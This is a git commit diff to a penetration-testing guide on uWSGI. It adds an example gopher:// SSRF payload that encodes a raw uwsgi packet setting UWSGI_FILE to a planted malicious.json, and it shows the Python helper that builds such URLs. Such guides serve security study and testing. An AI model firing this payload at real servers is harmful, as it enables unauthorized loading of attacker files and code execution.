Update wsgi.md

carlospolop · web-flow · commit 3d0de6888536 · 2025-11-07T02:15:44.000+01:00
diff --git a/src/network-services-pentesting/pentesting-web/wsgi.md b/src/network-services-pentesting/pentesting-web/wsgi.md
@@ -103,6 +103,9 @@ def uwsgi_gopher_url(host, port, params):
     body = b''.join([struct.pack('<H', len(k))+k.encode()+struct.pack('<H', len(v))+v.encode() for k,v in params.items()])
     pkt  = bytes([0]) + struct.pack('<H', len(body)) + bytes([0]) + body
     return f"gopher://{host}:{port}/_" + urllib.parse.quote_from_bytes(pkt)
+
+# Example URL:
+gopher://127.0.0.1:5000/_%00%D2%00%00%0F%00SERVER_PROTOCOL%08%00HTTP/1.1%0E%00REQUEST_METHOD%03%00GET%09%00PATH_INFO%01%00/%0B%00REQUEST_URI%01%00/%0C%00QUERY_STRING%00%00%0B%00SERVER_NAME%00%00%09%00HTTP_HOST%0E%00127.0.0.1%3A5000%0A%00UWSGI_FILE%1D%00/app/profiles/malicious.json%0B%00SCRIPT_NAME%10%00/malicious.json
 ```
 
 Example usage to force-load a file previously written on the server:
@@ -195,4 +198,4 @@ These do not directly grant RCE in uWSGI, but in edge cases they can be chained
 - [The uwsgi Protocol (spec)](https://uwsgi-docs.readthedocs.io/en/latest/Protocol.html)
 - [uWSGI 2.0.26 changelog mentioning CVE-2024-24795 adjustments](https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.26.html)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
